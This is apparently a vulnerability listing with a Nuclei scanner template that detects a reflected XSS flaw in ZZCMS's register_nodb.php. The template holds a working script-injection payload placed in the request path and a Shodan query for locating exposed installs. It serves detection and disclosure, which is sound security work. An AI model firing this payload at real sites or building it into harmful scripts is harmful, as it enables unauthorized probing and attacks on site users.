漏洞描述
Identified a reflected Cross-Site Scripting (XSS) vulnerability in register_nodb.php of ZZCMS, which allowed injection of malicious scripts via user-supplied input.
zzcms-register-xss: Zzcms `register_nodb.php` - Cross Site Scripting
PoC代码[已公开]
id: zzcms-register-xss
info:
name: Zzcms `register_nodb.php` - Cross Site Scripting
author: 3th1c_yuk1
severity: medium
description: |
Identified a reflected Cross-Site Scripting (XSS) vulnerability in register_nodb.php of ZZCMS, which allowed injection of malicious scripts via user-supplied input.
reference:
- https://github.com/Sinon2003/cve/blob/main/zzcms/xss-register_nodb.php.md
metadata:
verified: true
max-request: 1
shodan-query: html:"zzcms"
tags: xss,zzcms,vuln
http:
- method: GET
path:
- '{{BaseURL}}/3/ucenter_api/code/register_nodb.php/"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"><script>alert(document.domain)</script>'
- 'example=register'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022036b2e2422c647cd1c629c6d38418d4a9a451299467da4d484d8729aa854b2282022100dd05e77f86a82d78bb36505e08ac1f751932a8072da2c0734bfb4055c1bc6c9b:922c64590222798bb761d5b6d8e72950